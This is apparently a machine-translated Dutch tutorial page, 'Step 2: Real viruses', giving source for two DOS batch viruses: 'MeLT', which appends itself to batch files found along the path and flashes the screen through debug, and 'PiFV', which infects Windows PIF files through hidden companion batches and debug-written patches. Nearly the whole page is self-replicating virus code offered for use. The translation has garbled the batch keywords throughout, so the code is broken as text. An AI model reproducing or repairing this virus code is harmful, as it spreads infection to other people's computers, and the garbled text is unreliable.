Stap 2: Echte virussen (geavanceerde degenen)
1. de meest krachtige*******************
niet ' %0 ==' als ' % _melt % ==' goto meltbeg
::---dummy host---
uitschakelen
echo Hello World!
::---einde dummy host---
MeLTend [MeLT_2a]
: MeLTbeg
% _MeLT %
als ' %1 =='MeLT goto smelten %2
zoniet bestaat % comspec % set comspec = % _MeLT % commando
% comspec % /e:5000 /c %0 Vir smelten
set MeLTcl = %1 %2 %3 %4 %5 %6 %7 %8 %9
oproep %0 Smelten van rh
set _MeLT =
set MeLTcl =
goto MeLTend
: MeLTrh
set _MeLT = x
%0% MeLTcl %
: MeLTvir
set MeLTH = 0%
zoniet bestaat %_MeLT%%temp%\nul set temp = tmp %
Als het bestaan van %temp%\MeLT_2a goto MeLTrun
%0 Fnd smelten. % path %
: MeLTfnd
Shift % _MeLT %
als ' %2 == "sluiten MeLT
set MeLT=%2\%MeLTH%.bat
zoniet bestaat MeLT % instellen MeLT=%2\%MeLTH%
zoniet bestaat MeLT % instellen MeLT=%2%MeLTH%.bat
zoniet bestaat MeLT % ingesteld MeLT = %2% MeLTH %
zoniet bestaat % MeLT % goto MeLTfnd
vinden "Smelt" < % MeLT % > %temp%\MeLT_2a
attrib %temp%\MeLT_2a + h
: MeLTrun
% MeLTH % MeLT s. .. % path %
: Smelt
Shift % _MeLT %
als ' %2 == "sluiten MeLT
voor % in (%2\*.bat % 2*.bat) noem % MeLTH % MeLT inf %
goto smelt
: MeLTinf
/i "Smelt" < %3 > nul vinden
zoniet errorlevel 1 goto MeLTno
ECHO niet ' %% 0 ==' als ' %% _melt %% ==' goto meltbeg > MeLT.t
type %3 >> MeLT.t
ECHO. >> MeLT.t
Typ %temp%\MeLT_2a >> MeLT.t
verplaatsen MeLT.t %3 > nul
afrit MeLT
: MeLTact - flash-smelt tekst op het scherm zet dan terug naar normaal
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE > MeLT.t
echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8 >> MeLT.t
echo e 120 B4 4 C CD 21 00 >> MeLT.t
echo van g >> MeLT.t
Debug < MeLT.t > nul
del MeLT.t
afrit MeLT
: MeLTno
set MeLTC = % MeLTC %1
Als % MeLTC % == 1111111111 goto MeLTact
: MeLTend
*******************************************
2. Dit is een virus dat 'infecteert' PIF-bestanden, die worden gebruikt door Windows
DOS-programma's uitvoeren. Het werkt door het creëren van verborgen metgezel batches
die bevatten kopieën van dit vervolgens het pif-bestand zo wijzigen dat de
metgezel batch uitgevoerd eerste. Nadat het is uitgevoerd door de metgezel loopt de
originele hostprogramma, de naam van die is gecodeerd in de
metgezel. De PIF-bestanden zijn gemarkeerd, zodat ze niet zal worden
opnieuw besmet. Alleen het pif-bestand worden beïnvloed, geen wijzigingen zijn aangebracht in
de besmette programma's. Om te 'genezen', gebruiken PIFEDIT om te zetten de
oorspronkelijke bestandsnamen vervolgens de verborgen bestanden te verwijderen.
**********************************************
uitschakelen
:: host bestandsnaam...
set pifvo=LIST.COM
:: lus dispatcher...
als ' %1 =='PiFV goto PiFV_ %2
:: de virusscan uitvoeren!
set _PiFV =
zoniet bestaat % comspec % set comspec=C:\COMMAND.COM%_PiFV%
% comspec % /e:5000 /c %0 PiFV gaan > nul
Als het bestaan van PiFV! del PiFV!
:: de host uitvoeren
set PiFVcl = %1 %2 %3 %4 %5 %6 %7 %8 %9
oproep %0 PiFV hst
set PiFVo =
set PiFVcl =
:: Controleer voor activering...
ECHO. | date|Find /i "sat" > nul. PiFV
Als errorlevel 1 goto PiFV_end
ECHO. | time|Find "7" > nul. PiFV
Als errorlevel 1 goto PiFV_msg
set PiFV = echo
CLS % _PiFV %
% PiFV %.
% PiFV % er was ooit een Otter die met de naam Oscer
% PiFV % die beweerde te weten hoe om water te maken.
% PiFV % "Geen meer dammen," zei hij, "gebruiken mijn water!"
% PiFV %, maar de oudste Otter was niet onder de indruk.
onderbreken > nul. PiFV
set PiFV =
goto PiFV_end
: PiFV_msg
ECHO [PiFV] door WaveFunc
goto PiFV_end
: PiFV_hst
% PiFVo % PiFVcl %
goto PiFV_end
: PiFV_go
set PiFVh = 0%
zoniet bestaat % PiFVh % set PiFVh=%0.bat
Als dat niet het bestaan van % PiFVh % afsluiten
voor % in (*.pif) noem %0 PiFV inf %
PiFV sluiten
: PiFV_inf
set PiFVp = %3
:: krijgen slachtoffer bestandsnaam en infectie marker
:: uit PIF-bestand met behulp van debug...
Als het bestaan van PiFV! goto PiFV_1
ECHO m 124,162 524 > PiFV!
echo e 100' fn =' >> PiFV!
ECHO m 524,562 108 >> PiFV!
echo n pifv$ .bat >> PiFV!
ECHO rcx >> PiFV!
ECHO 47 >> PiFV!
ECHO w >> PiFV!
ECHO m 55E, 561 108 >> PiFV!
e 10C echo 0 >> PiFV!
echo n pifv$ $.bat >> PiFV!
ECHO rcx >> PiFV!
ECHO 10 >> PiFV!
ECHO w >> PiFV!
ECHO q >> PiFV!
: PiFV_1
foutopsporing % PiFVp % < PiFV! > nul
Bel PiFV$
set PiFVn = % fn %
Bel PiFV$ $
set PiFVi = % fn %
del PiFV$?. vleermuis
:: pifvn = orig bestandsnaam
:: pifvi = infectie marker
:: pifvp = PIF-bestandsnaam
:: pifvh = metgezel bat bestand
:: overslaan van besmette of 'lege' PIF-bestanden...
als ' % PiFVi % =='PiFV goto PiFV_end
als ' % PiFVn % ==' goto PiFV_end
:: geen schaduw command.com (aardig zijn)
ECHO % PiFVn % |find /i "commando" > nul
zoniet errorlevel 1 goto PiFV_end
:: ze - een metgezel batch maken...
:: (de volgende code verwijdert uit de extensie)
echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88 > PiFV$ $
echo e 110 c2 b4 02 cd 21 eb EG cd 20 ba 21 01 b4 09 cd 21 >> PiFV$ $
e 120 c3 ECHO 73 65 74 20 66 6e 3d 24 00 >> PiFV$ $
echo n pifv$ .com >> PiFV$ $
ECHO rcx >> PiFV$ $
echo van 2a >> PiFV$ $
ECHO w >> PiFV$ $
ECHO q >> PiFV$ $
Debug < PiFV$ $> nul
% PiFVn % |PiFV$ echo > PiFV$ $.bat
Bel PiFV$ $
set PiFVb=%fn%.bat
del PiFV$?. *
:: pifvb = nieuwe batchnaam
:: doen niet de schaduw als comp dezelfde naam als host heeft
Als % PiFVo % % PiFVb % goto PiFV_end ==
Als het bestaan van % PiFVb % goto PiFV_end
echo uitschakelen > % PiFVb %
ECHO set pifvo = % pifvn % >> % PiFVb %
vind "PiFV" < % PiFVh % >> % PiFVb %
attrib % PiFVb % + h
::.. .en richt het pif-bestand op de metgezel
echo e 15E 'PiFV', 0 > PiFV$ $
e 124 echo 'PiFVb %', 0 >> PiFV$ $
ECHO w >> PiFV$ $
ECHO q >> PiFV$ $
foutopsporing % PiFVp % < PiFV$ $> nul
del PiFV$ $
:: Ik denk dat we klaar!
PiFV sluiten
: PiFV_end
:: ben benieuwd hoeveel bugs al dit erin heeft? Slechts één
:: manier om erachter te komen...
***************************************************
